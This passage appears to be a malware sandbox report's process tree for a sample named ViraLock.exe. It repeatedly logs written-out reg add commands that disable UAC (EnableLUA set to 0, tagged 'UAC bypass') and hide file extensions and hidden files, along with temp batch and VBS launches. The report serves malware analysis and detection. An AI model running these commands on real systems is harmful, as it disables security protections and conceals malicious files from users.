        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        83⤵
        
        PID:5300
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        80⤵
        
        PID:5952
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        80⤵
        
        PID:3944
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        80⤵
        UAC bypass
        
        PID:5536
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CIgsMUUk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        80⤵
        
        PID:132
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        81⤵
        
        PID:5172
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        78⤵
        
        PID:5216
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        78⤵
        Modifies registry key
        
        PID:292
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        78⤵
        UAC bypass
        
        PID:308
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wUUosAUA.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        78⤵
        
        PID:4648
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        79⤵
        
        PID:6132
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        76⤵
        
        PID:5336
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        77⤵
        
        PID:5972
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        76⤵
        System Location Discovery: System Language Discovery
        
        PID:5348
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        76⤵
        UAC bypass
        
        PID:5748
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bSkwgwQw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        76⤵
        
        PID:3532
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        77⤵
        
        PID:2628
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        77⤵
        
        PID:5484
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        74⤵
        
        PID:1444
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        74⤵
        
        PID:5284
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        74⤵
        
        PID:5884
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xuwAUQww.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        74⤵
        
        PID:2576
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        75⤵
        
        PID:5152
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        72⤵
        
        PID:480
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        72⤵
        
        PID:3008
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        72⤵
        
        PID:5312
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RKsIgswk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        72⤵
        
        PID:2824
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        73⤵
        
        PID:5212
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        70⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5744
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        71⤵
        
        PID:5296
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        70⤵
        
        PID:5896
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        70⤵
        
        PID:5304
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bkIIoAYc.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        70⤵
        
        PID:4932
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        71⤵
        
        PID:4688
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        68⤵
        
        PID:5836
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        68⤵
        
        PID:5860
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        68⤵
        
        PID:5276
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EaoYsEsI.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        68⤵
        
        PID:5028
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        69⤵
        
        PID:4800
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        66⤵
        
        PID:4828
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        66⤵
        
        PID:5848
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        66⤵
        
        PID:5856
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GSsksYkA.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        66⤵
        
        PID:3844
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        67⤵
        
        PID:6136
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        64⤵
        
        PID:5152
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        64⤵
        
        PID:4484
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        64⤵
        
        PID:5244
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IcAMsUIw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        64⤵
        
        PID:5536
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        65⤵
        
        PID:5216
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        62⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5956
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        62⤵
        
        PID:2420
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        62⤵
        UAC bypass
        Modifies registry key
        
        PID:5552
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hyMwckQc.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        62⤵
        
        PID:1828
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        63⤵
        
        PID:5756
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        60⤵
        Modifies visibility of file extensions in Explorer
        
        PID:6080
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        61⤵
        
        PID:5532
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        60⤵
        System Location Discovery: System Language Discovery
        
        PID:5732
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        60⤵
        UAC bypass
        
        PID:3568
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nKMckcQY.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        60⤵
        
        PID:6132
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        61⤵
        
        PID:1092
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        58⤵
        
        PID:5828
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        58⤵
        
        PID:5260
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        58⤵
        UAC bypass
        
        PID:5312
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TAcYQQEk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        58⤵
        
        PID:5748
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        59⤵
        
        PID:4936
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        56⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5568
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        56⤵
        
        PID:5816
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        56⤵
        
        PID:5824
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZkcgkwYA.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        56⤵
        
        PID:5416
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        57⤵
        
        PID:5780
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        54⤵
        System Location Discovery: System Language Discovery
        
        PID:5672
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        54⤵
        
        PID:3944
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        54⤵
        UAC bypass
        
        PID:5704
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        55⤵
        
        PID:4444
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iEYsogUE.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        54⤵
        
        PID:3044
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        55⤵
        
        PID:4908
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        52⤵
        
        PID:5612
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        52⤵
        
        PID:5256
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        52⤵
        
        PID:5988
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qGoQsoUc.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        52⤵
        
        PID:796
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        53⤵
        
        PID:2576
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        50⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:5324
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        50⤵
        Modifies registry key
        
        PID:3404
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        50⤵
        Modifies registry key
        
        PID:5340
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QgkIEwEw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        50⤵
        
        PID:5784
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        51⤵
        
        PID:6112
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        48⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1004
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        48⤵
        
        PID:5704
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        48⤵
        UAC bypass
        
        PID:6048
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qWwsUMAA.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        48⤵
        
        PID:5684
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        49⤵
        
        PID:5020
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        46⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5868
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        46⤵
        
        PID:4540
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        46⤵
        Modifies registry key
        
        PID:3860
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xkgwoIMY.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        46⤵
        
        PID:5960
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        47⤵
        
        PID:5812
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        44⤵
        
        PID:3216
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        44⤵
        
        PID:5264
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        44⤵
        
        PID:4932
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pWwsscoo.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        44⤵
        System Location Discovery: System Language Discovery
        
        PID:5648
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        45⤵
        
        PID:6040
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        42⤵
        Modifies registry key
        
        PID:5936
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        42⤵
        
        PID:308
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        42⤵
        
        PID:5104
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VUIoIkcs.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        42⤵
        
        PID:5692
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        43⤵
        
        PID:5096
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        40⤵
        System Location Discovery: System Language Discovery
        
        PID:5320
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        40⤵
        Modifies registry key
        
        PID:4800
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        40⤵
        Modifies registry key
        
        PID:5640
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        41⤵
        
        PID:5552
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oCkwAkMo.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        40⤵
        System Location Discovery: System Language Discovery
        
        PID:4368
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        41⤵
        
        PID:5196
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        38⤵
        
        PID:6124
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        38⤵
        
        PID:5644
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        38⤵
        
        PID:3448
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qsUAEYgk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        38⤵
        
        PID:5432
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        39⤵
        
        PID:3216
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        36⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5828
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        36⤵
        
        PID:788
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        36⤵
        System Location Discovery: System Language Discovery
        
        PID:6012
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SCcYAkwQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        36⤵
        System Location Discovery: System Language Discovery
        
        PID:5908
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        37⤵
        
        PID:3228
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        37⤵
        
        PID:5952
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        34⤵
        Modifies visibility of file extensions in Explorer
        
        PID:6124
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        34⤵
        
        PID:5128
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        34⤵
        UAC bypass
        
        PID:312
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DWQUwkkY.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        34⤵
        
        PID:5188
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        35⤵
        System Location Discovery: System Language Discovery
        
        PID:4908
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        32⤵
        
        PID:4952
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        32⤵
        
        PID:5300
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        32⤵
        
        PID:5344
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DoscMUUw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        32⤵
        
        PID:5240
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        33⤵
        
        PID:4540
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        30⤵
        
        PID:5800
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        30⤵
        
        PID:5192
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        30⤵
        Modifies registry key
        
        PID:5244
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jQkkIccA.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        30⤵
        
        PID:5512
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        31⤵
        System Location Discovery: System Language Discovery
        
        PID:5664
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        28⤵
        
        PID:5844
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        28⤵
        System Location Discovery: System Language Discovery
        
        PID:5180
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        28⤵
        UAC bypass
        
        PID:5412
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BUUwsccE.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        28⤵
        
        PID:1984
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        29⤵
        
        PID:292
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        26⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5408
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        26⤵
        
        PID:5544
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        26⤵
        UAC bypass
        
        PID:5552
        
        C:\Windows\SysWOW64\cmd.exe
        
